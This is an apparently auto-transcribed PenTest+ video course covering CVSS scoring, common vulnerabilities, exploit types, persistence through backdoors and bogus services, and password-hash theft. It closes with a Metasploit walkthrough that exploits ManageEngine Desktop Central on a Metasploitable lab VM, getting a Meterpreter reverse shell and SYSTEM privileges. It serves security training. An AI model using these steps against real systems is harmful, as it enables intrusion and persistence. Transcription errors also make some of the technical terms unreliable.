are performed by simply running that exploit okay now the common vulnerabilities is scoring system or the so-called CVSs that I mentioned many many times okay so the the way that nist came up with this CVSs was so they thought okay we need to create some kind of classification now to classify these vulnerabilities we have to give them scores points how can we score these vulnerabilities okay there are different areas different different metrics that we can analyze in order to classify a vulnerability right so that was their thought they came up with a solution or at

least a set of metrics which are the attack vector d-axis complexity Authentication confidentiality impact integrity and availability impact and you can see between parentheses that we have a representation of each of those metrics or impacts attack Vector is represented by AV axis complexity AC authentication Au confidentiality impact C Integrity impact I availability availability impact a if we go back right here we can see that we have those letters right there AV attack Vector right and then you have the value which we're gonna see the value for attack Vector access complexity authentication Integrity complexity so these

are the metrics that we have now they decided that each of these metrics should be graded they should receive a score some points according to how critical they are or not so let's take a look at that so the attack Vector represents How It's associated with the criticality of the location of that Target so if a Target let's say that you have a vulnerability and this vulnerability exploits a Target that is local that means that that vulnerability will receive a score of 0.395. now you don't have to worry you don't have to be concerned about

these points the these scores that are described here first of all I'm taking CVSs version 2 as an example to generate to illustrate these points these scores you don't have to know to memorize these scores also because nist itself they have a calc online calculator that you just go there and you select so for example the attack for the attack vector is it a an exploit that can only exploit vulnerabilities or is it a vulnerability I'm sorry that is valid for a the local machine is it valid for adjacent machines which means machines that are

directly connected via network but directly connected to the machine that actually is actually exploiting that vulnerability or can you remotely use that exploit that vulnerability from anywhere for example from the public net or the internet so if it's a local attack Vector then you have that score if it's adjacent you have 0.6446 for example or network that's mostly the most critical one the score is going to be one once again if it's CVSs version 2 but it doesn't matter so these letters here l a n again if we go back there we can see that

the attack Vector here is n which represents Network as we can see right here so that vulnerability from the attack Vector standpoint is very very critical it has the higher grade the higher scroll score and you you must keep in mind that the score ranges from 0 to 10 and as higher as it gets more critical it is now the next metric that we have to look at is excess complexity so if the complexity to access that vulnerability is high well if it's very very difficult to actually exploit that vulnerability then the the score is

low which may be may sound confusing but you have to look at the access it's the axis complexity which means how difficult it is to successfully exploit that vulnerability if it's medium higher score low l so those are the letters high medium low and it's the opposite High gets the lowest score medium is medium and low gets the highest score for this metric here now we also have authentication we can have multiple M single s or none and once again it may sound confusing but it's actually the opposite the authentication means the number of authentication

systems that the um the vulnerability must have access to must successfully authenticate in order to exploit which means if it's an ex if it's a vulnerability that can only be executed or can only be exploited without any authentication that means that there is no authentication then the score is high if there is a single point of authentication single if there are multiple authentication systems then the it's very gets difficult to successfully exploit that vulnerability which means that the score is slow then we have confidentiality none and partial p complete c what does it stand for

so in case once let's say that vulnerability is successfully exploited even if it's exploited is any confidential data going to be made available to the attacker no so there is no compromise in confidentiality which means that okay no score if the information is made available to the attacker but that information is not important okay so it's partial but if the well rephrasing not actually important but if that information uh is just a piece of information that cannot be used used by the attacker then it's partial but it's a complete information just by that information the

attacker can uh gather get somewhere then it's complete which means that it gets the higher score so n p and C okay that's confidentiality and we have the same for integrity okay so if compromised the information the data remains unchanged um if it's partial or if it's complete and same same thing for availability okay none and partial p and C for complete availability which means none if the the vulnerability is exploited well the system remains available if there is a disruption in let's say in a service or just a partial disruption but if this service

or the host um is goes down fully entirely let's say if you have a dni of service attack then the availability metric goes to complete C and it gets the higher score so once again let me go back there and we've if we take a look at the CVSs vector that's what we have in this case I'm illustrating CVSs version 2. so um the attack Vector is Network the access complexity is low Authentication is none confidentiality is p which means partial same thing for integrity and availability availability also partial okay so we have those scores

but if we simply add up these points We're not gonna get to the same CVSs basis chord that is Illustrated there okay now why because we have weights for each of these metrics so the CVSs basis core is actually actually calculated by this formula here so 0.6 times the impact plus 0.4 times exploitability minus 1.5 all that plus the impact function and what are these what is impact what is exploitability what is impact function and here it is so the impact is 10.41 times so that that's it's that formula that you can see right there

we also have the exploitability which is right there okay so the impact takes in consideration confidentiality integrity and availability whereas exploitability takes in consideration a tech Vector excess complexity and authentication okay and then finally based on the impact we have the impact function which is zero in case impact is zero or 1.176 otherwise which means in case the impact is higher than zero now once again keep in mind that this CVSs basis score here a this calculation considers CVSs version 2. it's a little bit different for CVS as version 3 but you are not to

worry about it for two main reasons the CompTIA pentas plus exam is not actually going to ask you to do this do this calculation what it wants you to know is the categories which we're going to take a look at right now and also so that's one reason the only reason is because we have as I previously mentioned we have the online calculator which is um in the nist website and there it is so here's the link right here that's the URL where you can see information about the this these tables the categories and also

you can get access to the online calculator okay now this is what you have to know for the CompTIA pentas plus exam okay and this been extracted from the nist website okay so if we take a look at the CVSs version 2 ratings or categories we have low medium and high low if it ranges from ranging from 0 to 3.9 medium from 4 to 6.9 high from 7 to 10. CVSs base score version 3 none so we have two new classifications here none if it's zero low ranging from 0.1 to 3.9 medium 4.026.9 high 7.02

8.9 and critical from 9.02 10. so if we go back there again when we ran nessus in our last module our previous module module 4 that's some kind of result that that you can get okay and that's how you interpret that information now what are the types some of the types of vulnerabilities that may exist that we may find and that will generate these scores meaning what are the critical vulnerabilities that we can find or at least the most common ones which usually is associated with the most critical ones so some examples outdated systems outdated

devices unsupported devices so there is a big difference outdated systems for example or softwares are softwares that were not updated so they're up outdated unsupported are those that are not being supported by its manufacturer or developer anymore for example windows 7. it's unsupported buffer overflow buffer overflow is an attack that is very much used it is still very much used but not many softers are vulnerable to this type of attack but anyways a buffer overflow is an attack that happens when one a a specific type of data is inserted is sent to the software in

a way that the software does not properly manage that data that data can um be reallocated to another space of memory it will cause that software to disrupt or crash another software or either even the the entire machine itself so the machine can crash just because a software was not properly designed privilege escalation that's when you get access with a user usually with a guest user or with a very limited user and then from that user you can escalate get access to more privileged users shell coding shell coding is also a this is a very

common type of attack and very resourceful very useful and also very successful so in a very simplistic way shell coding attack is simply an attack where you run a code and for some reason there is a technical reason but in different occasions you can get access to the system as the administrator so for example if the operating system has a shell coding vulnerability if you get access to that system you can run that exploit usually it's exploited by an exploit you can simply run that exploit and boom you you become in admins admin user insecure

protocol protocols that are not secure that they do not use cryptography so for example telnet um is a very ancient protocol but it's still around um we're going to mention another one which is DNS but DNS must be mentioned separately because it's very critical um there are protocols FTP for example is another protocol SNMP versions 1 and 2C not version three ntp protocol is another one so there are many many protocols that they are not known for their um security resources certificate expired certificate or invalid certificates these are huge problems and the reason why is

if there is so for example you may remember that when you accessed after you installed nessus and you accessed https column uh slash slash localhost column 8834 then it showed to you hey you're trying to access a web page here that has a certificate but it's not recognized it's not a valid certificate what is the problem there the problem is that you are accessing a web page that says that all the information that is transmitted there will be encrypted however you don't know that you are actually accessing the web server that you do want to

access so you could very well be accessing a server that is not the server that you want to axis DNS the reason why I mentioned DNS separately is because DNS can lead an attacker to different types of attacks DNS spoofing being the most well-known one actually the uh domain name system protocol is known as a very flawful protocol it's full of um flaws it's full of holes and that is actually why DNS SEC is another protocol or an extension of the DNS protocol because DNS is a a protocol with many row holes information disclosure well

obviously information being made available when it shouldn't and that is something that the vulnerability that we were able to find in my modem allows an attacker to do that so because of the version of the the the the web server the Apache HTTP web server an attacker can gather information that he or she is not supposed to Miss configuration also very very common and that's only because it's configured by us human beings and we are full of flaws so we commit errors we make mistakes iot well I generalized um network devices or non-traditional network devices

as iot but that's because I want to associate it with let's say your fridge your air conditioner your UPS any device that is connected to the network it's I tcpip enabled but it's not common traditional network devices it's not a router it's not a desktop it's not a switch it's not a modem it's not a mobile phone it's not not a desktop laptop not nothing like that okay so we can generalize these as appliances now why is it growing so much why do we list it here as common vulnerabilities well because that's exactly what's going

on these appliances are growing every day the they are being very well accepted by um residents by people by the population so for example any air conditioning system nowadays will probably come with the tcpip stack enabled the same thing is valid for smart TVs for example actually that's the characteristic of a smart TV um same thing for fridges and so many other other appliances injections there are different types of injections several different types of injection injections you have ldap injection but the most famous one and most exploited one is SQL injection or SQL injection if

you prefer and we are actually going to take a better look in that in another module because it's so important cross-site scribbling that is another type of attack that we will look into this is a type of attack where a an attack or a code is inserted into the server to attack the client so it's very very common to see this type of attack happening via forums so maybe you faced this at some point in your life where you tried to access a web page usually a forum and when you you access it your antivirus

popped a a window saying hey you shouldn't access this webpage there is some suspicious code in here so that's exactly what this type of attack does it uses code that's been inserted into a web page to be sent to the client and then the attacker can leverage their attack okay so in this module in this specific video we discussed actually we focused on the CVSs base score our goal was to understand what that score means so we learned that the that score will tell us how critical a vulnerability is if it is indeed now the

reason why it's so important once again is because it will help your client or the staff that is responsible to address those flaws to create a schedule and then come up with a sequence of Assessments in order to fix all those flaws there must be a priority we also discussed the most common vulnerabilities and this is all going to be very helpful for the continuation of our course I hope you enjoyed this video thank you very much hello in this module we are going to discuss some types of exploits and the reason why we have

to understand these types is because well first of all our first step after or at least the post tab once we're done with the vulnerability scan is to actually determine which exploits we're going to if we've found exploits right or vulnerabilities which exploits if available we're going to use um and in order to Define that we have to consider their uh CFA CVSs base score so we have to analyze how critical the vulnerabilities that we found are once we can identify that we have to first Define determine okay so this is what I'm going to

do so these are the ex the vulnerabilities that I'm going to exploit if I have those available now in order to do that I have to understand those vulnerabilities before I can actually exploit I have to understand what that vulnerability is about for very obvious reasons if I don't know what it is about I don't quite know what to do once I explore it if it's a more difficult to exploit vulnerability I won't even be able to exploit it so we have to understand the types that we have once we have that in mind once

we know at least some more important types of vulnerabilities then we can actually exploit those vulnerabilities and once that's done we have our following steps which is okay I've exploited it what do I do now because there are situations where the exploit is just running the exploit achieves your final goal so for example if you're running a buffer of buffer overflow attack well it's going to crash the machine or softer if it's a deny of service same thing but if it's not if the idea is to gain access okay what do I do once I've

gained access to that machine we're also going to discuss that here as well and finally we have the post-exploitation phase which is okay exploited I've done something for example I'm trying to escalate privileges so I gained ask access as a regular user and I I want to try to become an admin user just an example so once that's done what do I do next we have to Pivot our um our exploitation phase which means okay we've exploited that or those devices but from those devices I can maybe try to get access to other ones and

finally we have to keep keep in mind that you have to disguise you have to erase any tracks so you don't want to be tractable you don't want even to be seen right so when you get access when you target a machine and you exploit a flaw you don't don't want that company or that client in this case to know that that actually happened so we are actually going to go through these phases right now so first of all we have to understand a few types of exploits first one is the remote procedure call although

it is a old flaw because um most recent operating systems they don't work with RPC at least not generically as it used to to be back in the day many many operating systems they would use remote procedure calls to run services to invoke any kind of procedure well this is because of the the RPC flaws security flaws they are not being that much used anymore but they are still around so that's one that we have to look into or at least pay attention to another one now talking more about Windows environments we have also owed

we have the PS exec so Microsoft Windows they rely on a protocol called SMB service message block now SMB runs several different protocols or at least several different services and one of these Services is the one that it runs on Port 445 to execute remote procedures similarly to the RPC Microsoft created their own RPC protocol to communicate establish communication and send instructions to remote windows environments other remote windows environments as well similarly to the RPC um although you still see the SMB protocol on Port 445 for remote commands or remote procedures this is becoming uh

they're they're not being used anymore although they're still available the most recent recent Windows systems they disable this service but if you see that part you know that that's in that support that that is an entry that you have right there another one is similarly to PS exact more recent Windows operating systems they started to implement Windows Remote Management or win RM which is similar to 2DS is Zack but using Powershell to send remote commands and we have a more generic and at the same time more complex system also for Windows operating systems which is

the Windows management instrumentation wmi which allows you to remotely run everything so it's not limited to remote commands but you you can you can execute a software you can shoot a a a task you can schedule a tasks you can reboot the machine you can install softer you can remove so basically you get a full control of a Windows machine using this instrumentation protocol or tool schedule jobs that is another type of task actually that you can run once exploited now keep in mind that this specifically is not an exploit but this is a task

that may be executed once exploited the idea here would be okay I want to make sure that something happens so I've exploited a vulnerability I gained access to a machine I want to make sure that something is executed every now and then so let's say that I get detected um and the the IT staff that was able to detect my presence they removed the back door that I installed okay if I can schedule an event and I can reinstall and reopen that backdoor that I had before that is just one way of the of analyzing

this possibility another protocol server message block which is the SMB protocol itself not only remote procedures through Port 445 but the server server message block protocol created by Microsoft allows Windows machines to exchange for example um not only commands but also messages share files share resources such as printers files and Etc so this is a a protocol that has many failures many flaws and there are several exploits available for it and then we have some other remote access softwares well it's most well known for its window Solutions specifically the windows remote desktop tool or RDP

so one good example that we have is terminal service that comes with any Microsoft servers solution it allows remote desktops to connect to that server and then use that server's resources um so this is a very common resource that Microsoft environments use in order to share resources therefore people were able to find many vulnerabilities or develop new exploits and many of those are available the same thing happens to other softwares such as this one so we can think of VNC team viewer and so many others and we have some other protocols that allow remote execution

such as the graphical remote server or the X servers for Linux and Unix environments telnet although you don't see telnet anymore nowadays but this is a protocol that you have to at least know about for the CompTIA pen Test Plus exam and SSH which is the evolution of telnet because basically it's the same it does the same thing or it's been created to do the same thing allow you to remotely get access to a remote machine but now using encryption so that's SSH okay but once you get access once you exploit a vulnerability and that

exploit actually gives you access to that machine what should you then do then or what could you do then well one first attempt would be to gain privilege or escalate or privilege meaning if you are a regular user you can try to become a more privileged user or even become an admin user if you are a guest user you can try to become a regular user with more privilege than the guest user you can also try to crack passwords now there are seven different different ways that you can try to accomplish this first of all

if you are in a Windows environment now once again this is um not not the the most Windows operating systems are not susceptible to the PW dump attack anymore but considering that you are targeting desktops as well it's very common to see desktops with old versions of Microsoft Windows such as Windows 7 for example so you can perform PW dump in that type of Windows system which basically will try to fetch the Sam file the Windows security account manager file that's the file that stores users accounts and their hashed passwords it's not the plain text

password but it's the hashed password that can then be broken in some situations so if you can get access to the hashed password you can use other tools to get access to find out what the plain text password actually is similarly in Linux environments we have the slash Etc Shadow file and many people talk about the slash Etc slash past WD file but the slash Etc pass wd5 in a Linux environment um is only used to store accounts not passwords so the shadow file is the file that actually stores the hashed passwords as well and

you can also sniff the network considering that now you have access to a machine you can sniff the network using that machine so for example if you have FTP packets flowing and if there is someone that is actually in the authentication phase and if it's FTP not SFTP you can actually capture the username and password being transmitted in plain text now you must keep in mind that it's not going to do to be this simple because in a FTP transmission probably what e what is being transmitted is the authentication between a source and a destination

which means that traffic those packets are not arriving to your uh vulnerable machine the machine that you just exploited uh interface so you won't be able to capture that traffic which actually will demand you to perform a r spoofing attack that it is it's not that difficult to deploy to implement and we're actually going to see that in a following module now regarding passwords how can I crack passwords again we are now considering that you got access to the hashed passwords to the database that actually stores their database well you can use a software such

as Hydra you can use a software such as John The Reaper and John the reaper although it's a very very old software it's still pretty accurate once again as long as you have you got access to the hashed password database now even if you get access to those hashed password database and a software such as gender Reaper cannot break it well you can actually use rainbow tables so for example John the reaper has a limited number of algorithms hash algorithms that it supports okay what if your version of John the reaper of your or your

gender Reaper doesn't support that specific algorithm what you can try to do is to get access to a very large rainbow table now what is a rainbow table a rainbow table is a file or a set of files that will have a correlation of plain text and it's hash so let's say that you have the plain text password what is the hash for password well that varies a lot because it depends on the algorithm the hashing algorithm but you can have rainbow tables that is generating hash for the same keyword the same plain text using

different algorithms so as you can imagine it is a very very large file or a very large number of files or tables with that type of Association but you can then try to match the hashes that you have in the database that you were able to get access to you were able to retrieve for from that Target machine with the rainbow table that you have and the good news is well you can use software to generate rainbow tables but the good news is that there are many many rainbow tables available on the web and you

can just download those now let's say that I was able to exploit a vulnerability I was able to do whatever I wanted to do so I was able to um escalate my privilege I was able to crack password whatever it is that I wanted to do now obviously if I am a hacker or even a pen tester I want to persist what does that mean that means that I do not only want to get access to that Target that I just got access in this specific period of time but I want to be able to

come back later for example or I want to make sure that I can continue to receive traffic for example that is being captured and then I want to receive that traffic by email for example okay so if you want to persist there are some different ways of doing it one as I previously previously mentioned is scheduled tasks or jobs so I want to make sure for example I want to write a batch script that will constantly let's say every day it will check whether the back door that I installed is still there is it installed

or and or running if it's not I will issue another instance of that back door I can modify the inet D or X if it's a Linux environment I can modify the inet dxinetdli inet D systemd which are and inet d goes back to the very first versions of Linux these are called super systems why are they called they called super systems because they are softwares they are systems that control other services now if I can control a software that control other services I can at the end control those services or I can do even

more I can guarantee that my own service that I created will remain running I can even do more than that I can guarantee that service will be executed as the admin user so if I get access to these systems if I can modify the systems I can simply control the way that other services will be executed now which leads us to this other bullet here which is add new or bogus Services New Services you create your own service for example open a bed door so that I can connect later on or BOGO Services is well

let's say that Target machine actually had a service it already has its own Services now right now those are the services that are expected to be running in that machine I don't want to create new Services because if the admin actually takes a look at the list of services running that person will see and realize hey this service was not supposed to be here but if I can change a service as in a way that it just continues to run but now it's also adding something good for me which is opening a back door well

that will be a lot harder for the admin to realize what's going on and obviously that's the most traditional way of getting back to another uh to a targeted machine which is installing back doors and also very old technique which is creating new accounts I want to make sure that when I get back I have not only my previous account but other accounts in case something happens I can create new accounts I can modify on a a node account now something that you have to keep in mind and this is very very important and it's

also uh covered by the CompTIA pen Test Plus exam you have to remember not only as a hacker but as a pen tester as well derive and disguise what does that mean deriving means pivoting you got access to you exploited one specific device now you have to derive to others you have to Pivot to other devices that is just your part of entry from that part of Entry you now have to try to get access to other devices other networks other branches whatever that is even or other architectures and you always have to um prevent

from being detected although this is not hacking this is pen testing you want to make sure that your clients infrastructure and staff can detect and see analyze what's going on if they can't well then something has to change and if that's the case you have to show to your client hey I did this and your staff was not able to detect it so you're not only vulnerable but you're also vulnerable and if that happens if you're exploited you won't even know that actually happened so keep that in mind you have to know um at least

some types of exploits you have to know some ways of gaining privileges or actions that you can do once you get access to a targeted machine and once you do whatever you wanted to do you also want to make sure that you're capable of installing some kind of back door because you want to be resilient you want to be able to get back to that Target once again in the future and once you've done that from there you want to Pivot you want to derive two other targets and keep in mind that you're always focusing

on covering your tracks remain undetected I hope you enjoyed this video thank you very much hello this is our module six the second video of module 6 and here we're going to see some vulnerabilities database or exploit database more specifically and we will also understand why we have to actually get accustomed to this type of website this this type of databases so first of all in our next video and probably in the following modules that we're gonna use and see we're going to use a framework called merisplottable so what is the meta exploitable module uh

framework so the meta exploitable framework is a framework that that runs an operating system which can be Linux or Windows 2008 full of vulnerabilities now we have to keep in mind that the goal here is not to actually perform hex perform invasions we're not learning how to become hackers we're learning how to become pen testers for that purpose the CompTIA pentas plus exam requires you to know how to use exploits and how to leverage those exploits in order to test a client's infrastructure so the goal is not to test whether you're capable of using a

complex exploits or coming up with complex ideas complex plans that's not the case Okay so the reason why we learn and actually the CompTIA pentas plus exam expects you to know the meta exploitable framework is because okay this is a framework that you can use to run some tests and improve your knowledge okay they're not very much concerned about how complex it is to actually exploit those vulnerabilities now the matter exploitable that we're going to use is meta exploitable 3. if you don't want to use Mary's Deployable 3 you prefer to use meta exploitable 2

that's perfectly fine um the only reason why I bring to you Mary splitable 3 and I actually advise you to use this one is because this is the one that we're going to use in the following this video and the following videos so just to make sure that we are going to have some compatibility here so that's the website right here where you can download this specific preview of Mary's portable 3 okay so why is this previewed very exploitable 3 different from any other well the reason is this metisplayable 3 runs as you can see

right here it runs a Windows 2008 2008 server traditionally metal exploitables they run Linux with like I said many vulnerabilities but we want to test Windows systems although at some point we're also going to test Linux systems but mostly Windows Server systems because this is what is more available this is what the industry uses the most um specifically talking about desktops and although desktops are in in higher presence in regards to Microsoft Windows the vulnerabilities that we're gonna see here they work for desktop systems Windows desktops and windows servers at least some versions of those

okay so if you come here and then and here you can see the the actual link right here so this is at GitHub so github.com slash Brimstone slash marisploitable 3 slash releases slash tag slash 0.1.4 now this is the version that we have available in this current um in this date so depending on when you're actually going to do this you may face a different version therefore you may face a different um link okay now very important this um this marriage exploitable here is actually a OVA file and what is a OVA file it's a

Oracle virtualbox machine file so you don't actually have to install maybe if you search for a meta exploitable three Windows 2008 server you're gonna see some files that you can download but that will require you some that will require some interaction from you some manual work so you're probably gonna have to compile a bunch of stuff and this OVA file here will give you a virtualbox virtual machine that is complete you just have to download it and run it and then you're gonna see it there so that's the link once that's done um you're gonna

have your meta exploitable machine virtual machine running we're not going to use it in this video it's going to be object of study in our next video right now what I actually want to show to you what I want to present to you is the vulnerabilities databases that you have available or exploit databases that we have available but before we go there I want to go back here to nasus and we learn how to use nasus in a previous module now this Windows 2008 is scan here is the scan that I ran against a mer

exploitable machine and when I ran it we can see here that we have 10 critical vulnerabilities three High vulnerabilities 22 medium 4 low and a bunch of information oops okay so well obviously I want to take a look at the critical vulnerabilities right so out of these critical vulnerabilities here let me take a look at the first one that we see here CGI abuses and it's telling me that there is a softer running called manage engine desktop Central tan um and there is a very as we can see here very critical flaw here with CVSs

base score 10 if it's version 2 basis score 9.8 if it's version 3. and this is the cve that is associated with it okay so although NASA's does show us a description here it shows the solution the output sent by by the the server that's the port that runs that service which is vulnerable to this type of attack that's on part 80 20 okay um uh and then we have all that information that we already saw in the past now still I don't see too much information here and that is one of the reasons why

we have to know some vulnerabilities and exploit database now first of all the nist nvd national vulnerability database this is a website that will actually present you and we know that when we see National it means American so it's a United States vulnerability database it's a government project that maintains all reported and official vulnerabilities that are known and here you can also see some information about exploits but it's important to know this website because first of all you can come here and search for a specific vulnerability in order to understand what that vulnerability actually is

also because you have to follow the latest vulnerabilities so if you're becoming a pen tester you have to be aware of all the new flaws that are arriving that are coming up okay so same thing for database exploit exploit databases I'm sorry such as the exploitdatabase.com website also rapid7.com and vodb.com now what do these three websites have in common they are focused on exploits they are not only focused on vulnerabilities but the exploits itself so for example if I come here and let me take a look at this WordPress plugin automized 2.7.6 what does it

do what is this all about okay oh look so does this mean that that I can actually download the exploit well can be so you have to actually take a look at edit down here but what is interesting is you not only have information about the vulnerability but also about the exploit right so uh the exploit title is right down here a description of that exploit and then you have even instructions on how to exploit that vulnerability so this is very very useful and important information so different from the national vulnerability Database The American National

vulnerability database which has information about vulnerabilities here you have information about the exploits themselves so they're actually explaining to you how to leverage that vulnerability so same thing for these other websites and um this is very very important for pen testers as you already know by now pen testers are not only supposed to know about vulnerabilities but we must also know how to actually exploit those vulnerabilities so in this video we talked about the meta exploitable framework and now we know that we're going to run it as a virtualbox virtual machine running a Windows 2008

server instance running many many vulnerability services with vulnerabilities and we all also saw some exploit vulnerability and exploit databases which are very important to you as a pen tester I hope you enjoyed this video thank you very much hello Welcome to our technical Hands-On class on exploiting with NASA's so we've seen in a previous module how to use nasus and we started to learn in this module some types of exploits that we have available we also discussed about Mary exploitable The Meta exploitable framework which can run a Linux system or Windows system with many vulnerabilities

in order to allow us to train practice pen testing so this is the class that we're actually going to see how it works so first of all you can see right here um our Windows 2008 server running and it's running because of the mer exploitable version 3 with a Windows 2008 now there are many vulnerabilities available and we're going to actually see that one of those vulnerabilities is present in this tool here called manage engine desktop Central nine and I believe that nasus is going to detect it as desktop Central TN but it doesn't make

any difference because both of them have the same vulnerability that we're going to see well first of all you can see that the manage engine desktop Central is running on the localhost port 80 20 any and what is the managing engine desktop Central this is a software that allows you to control an entire Windows environment so from one single um point from one single location one single window system you can manage many other Windows systems whether they are servers or desktops so you can see here for example that you can actually manage active directory you

can manage work groups you can manage desktops you can update their their system you can install softwares you can activate disable firewall Services there is a bunch of stuff that you can do using the manage engine desktop Central okay which is a very helpful tool and that is why so many companies actually use it because it's uh it's it's very very handy tool okay that's very good now let me go back here to my um browser back to my NASA's scan result and this is the same scan result that I showed in the previous video

right where we had about 40 vulnerabilities and 120 information only now out of those vulnerabilities we already seen that the ones that we have to address first we have to look into first are the critical ones so and it's nurses will by default will list the vulnerabilities according to their criticality so the ones that are more critical will come on top and then it will start to lower the the the the status of that vulnerability as you can see here when it shows mixed at the top that means that we have critical probably high vulnerabilities

so let me click there first and we've seen this in the previous video okay so okay nice so we have critical critical medium and info are related to the same vulnerability all obviously we want to take a look at the critical ones or the critical one that's why I'm going to click on the first one here and there is our description the manage engine desktop Central application running on the remote host is version 10 prior to build one zero zero fourteen nine it is therefore affected by a remote code execution vulnerability the solution is to

upgrade it to version 10 build 100479 and then we have the output we have a bunch of information here we can see that this the manage engine desktop Central actually runs on various ports Port 80 20 for as a web server Port 8022 also web server and Port 8383 also web server okay and here we have some information about the CVSs base Factor base score um and some information about the CV about the common vulnerability and exposure which is identified by cve 2020 10 189 okay we've seen it before we know how to actually take

a look at it but what do we do with this information okay so I know that the meta exploitable Windows Server 2008 has a bunch of vulnerabilities and I NASA's told me that but what can I do with it and this is where we're going to talk about on a another framework which is called merisploit and what is metisploit marisploit is a firmware that was designed for a Linux environment and basically what it does is it runs a it knows a bunch of exploits a bunch of vulnerabilities and exploits to exploit those vulnerabilities you just

have to know well first of all if marisploit has the exploit to exploit the vulnerability that you have once you figure that out you have to learn how to actually use that exploit and when you use that exploit in order to use that exploit usually you have to inform some stuff you have to pass some data some input to that exploit and then use you're gonna see what happens okay so let's take a look at that I am gonna go to my kala Linux machine right here and as you may remember one of the bright

bright sides about the Kali Linux operating system is that either already comes with a bunch of tools and that's the case of the marisploit framework in order to get access to Metasploit you simply have to run msf console once you run it you're going to see this brief of introduction and welcoming screen it may take a while to load okay so here is a introductory output so we have 2045 at least in the this version that I am running right now as of today so 2045 exploits 1106 auxiliary exploits 344 posts that's the number of

payloads that we have encoders and evasions or evasion techniques okay and it also gave me an introduction up here okay very good now first if you want to take a better look at the Met exploit framework console you can enter the question mark right here and then you're gonna see a bunch of options that you have available and I am scrolling up all the way to here okay so you have all these commands remember this is a console so you can actually enter commands uh Banner CD color blah blah blah you have a bunch of

options a bunch of commands here and obviously since we have too many we're only going to take a look at the at the main ones okay so first of all I want to actually see whether I can exploit that vulnerability that was specified right there okay that's very good now since I want to see whether I have support or not I can use this Search Command now the search command is used to search for a bunch of information okay for example if I know the cve I can use search CV and I'm gonna go back

there take a look at the cve which is CV 2020 10 189 10 189 I'm gonna go there CV 2020 10 9. now is that what it is let me go back there 10 189 there you go desktop Central D serialization okay so here it is and the status is excellent that means that it is a very accurate precise and working exploit now I am also going to do another search because I know for a fact that there is another exploit that we can use in order to leverage this vulnerability is there any specific reason

why we're not going to use this exploit here well actually it's very simple I decided not to use this one because there is a bunch of additional information that I have to pass as input to the exploit and we can leverage the same vulnerability using another one so and it's gonna actually help us take a look at another way of searching so I can search um for a exploit author and I'm going to search for sinner this way okay that's so that's because I know that we have this the the this is an author this

is the author of one of Devon exploits that leverage that vulnerability so when you search by author it's going to show all the exploit that author wrote okay and the one that I am actually searching for is a exploit for Windows and for a web server running on windows so it's gonna be HTTP not local and it's alphabetically order which means that it's HTTP and I know that it starts with right here manage engine connection ID right that's exactly what I want now again comparing those two why do do I prefer this one um inside

of the other because they both do the same thing they they both deploy a reverse TCP connection what is that type of attack a reverse TCP connection is an exploit that we will leverage a vulnerability that is available um in a service in a software it will open a back door in my own machine my attacker machine allowing that Target machine to connect to mine but it's a reverse TCP connection because I want to force that Target to connect to my machine in a way that whenever I run a command it will actually be executed

in that machine that's why it's called a reverse TCP attack or reverse TCP connection okay so I am going to I can either copy this line here okay or I can use this number so in order to Define which exploit you want to use you're going to do use and then as you can see right here there is insta there is instructions right here you can either say use and then the path to that exploit or the number of that exploit which is um 214. however it says no payload configured defaulting to Windows meter printer

reverse TCP okay that's correct because the payload that I'm going to use is a meter preter there are different actually eight different types of payloads and the most used one in probably most powerful is the meter preter why is it so powerful because what it does is it leverages a vulnerability of a software and it inserts a code into that same instance of software it does not create an additional process why is that so powerful because if the the person or staff responsible for managing that infrastructure that I'm targeting if they check the processes that

are running that machine they're not going to see an additional process because the code that I am inserting is being inserted directly into the ram into the memory associated with another current software service that is running okay now how do I run it do I simply Say Hey I want to run it well there are situations there are exploits that they are single that you just have to run those there are other ones that are what is called staged okay and that's the case right here so this is a exploit that use a staged payload

what does that mean a staged payload requires a few information and also it will require a stage which is a softer to be downloaded so a Stager which is the case of this payload we'll download additional code this additional code will be sent to the Target loaded into the RAM and then connect to my machine so that's why the meter breeder payload is so powerful okay now as I mentioned usually there are some options that are required here how can I see those options pretty simple you can simply run options okay so what are the

options that I have here um first of all our hosts remote hosts is it required yes it is and remote part yes it is Target URI is also required but if I don't mention there is the default option here which is Slash the remote Port is by default is 80 20 that we may remember if we go back here that's exactly the port that I am willing to attack that's the vulnerable Port okay however remote hosts is required and there is no information here so how do I Define the remote host I use set our

hosts that's the variable name and then the IP address which is this one okay if I go there to my Windows machine and I go right here to the command prompt I am listing my meta exploitable Windows 2008 IP address right there 192 168.022 okay very good I go back here I Define it is that all well no that's not all let me run options once again so now I can see that the IP address the target IP address is there the port is there the target URI is there but there are some payload options

payload information that is also required okay the local Port that my attacker's machine Port that's the part that my machine will listen to in that reverse TCP connection that's the part that my target will connect to in my local machine and my attackers machine IP address which is correct so what do I do now I simply run that exploit and let's see what happens creating JSP Stager as I mentioned this is a Stager a Stager needs to download the stage and it's sending that stage that code to the remote machine meter reader Session One opened

so there is a connection between these two machines right here okay at that specific date and time and that's done if there was an error it would say hey I wasn't able to connect something happened it would show you a debug message okay now let's see what we can do here okay observe that it's now showing meter preter here the meter preter console it's not showing the msf-5 console anymore what if I do get system this is a command that will actually in a reverse TCP connection that will see if I can become admin the

admin user and okay there it is in memory admin I am connected to that machine as a admin user that's exactly what I wanted so whatever I do here I am running the com the tool that I use here I'm using that tool running that tool in my target machine as a an admin user now you may ask okay but what can I do what are the options that I have you can use help to see all the commands that you have and you're gonna see how powerful it is so I can for example get

some information [Music] um get Sid for example that's the server Sid get desktop in case it's associated with a domain session I can actually get some system information which is info right here so okay that's that machine vagrant 2008 R2 Windows 2008 server service pack one it's outdated yes it is the architecture that is it doesn't belong to a domain it belongs to a work group okay and you can copy files you can run files you can edit the register on all possible options are listed here okay so you have all those those options you

have full control you can get access to the same file in case it is a system that has a Sim file copy files remove shut down reboot you can do a bunch of stuff by using this specific exploit now keep in mind the goal here is not actually to see whether you can get a get control of a machine and what you can do once you get control but actually just to show you that you can use the metisploit framework to leverage those vulnerabilities by using these exploits I hope you enjoyed this video thank you

very much hello welcome to module 7. and our topic here is going to be exploiting networks so we're evolving in our previous module the focus was on exploiting local vulnerabilities so Le we were assuming that you could just run and exploit and that exploit would give you a specific result without having to understand much about the network infrastructure in which that Target was inserted in so in regards to the topology it looked like a local exploitation although it wasn't a local exploitation we we saw that we can have local or network exploits but the thing

is the the idea was the way that you'd execute would look like you didn't have to know anything about the that Network infrastructure or topology which is different now because now our focus is on exploiting networks or networks network resources such as protocols so when exploiting networks there are different ways of doing it so we can attack Network protocols as I mentioned so we can focus on some protocols for flaws or maybe misconfiguration okay one that we saw in a previous module was the net bias which is the protocol actually the the the set of

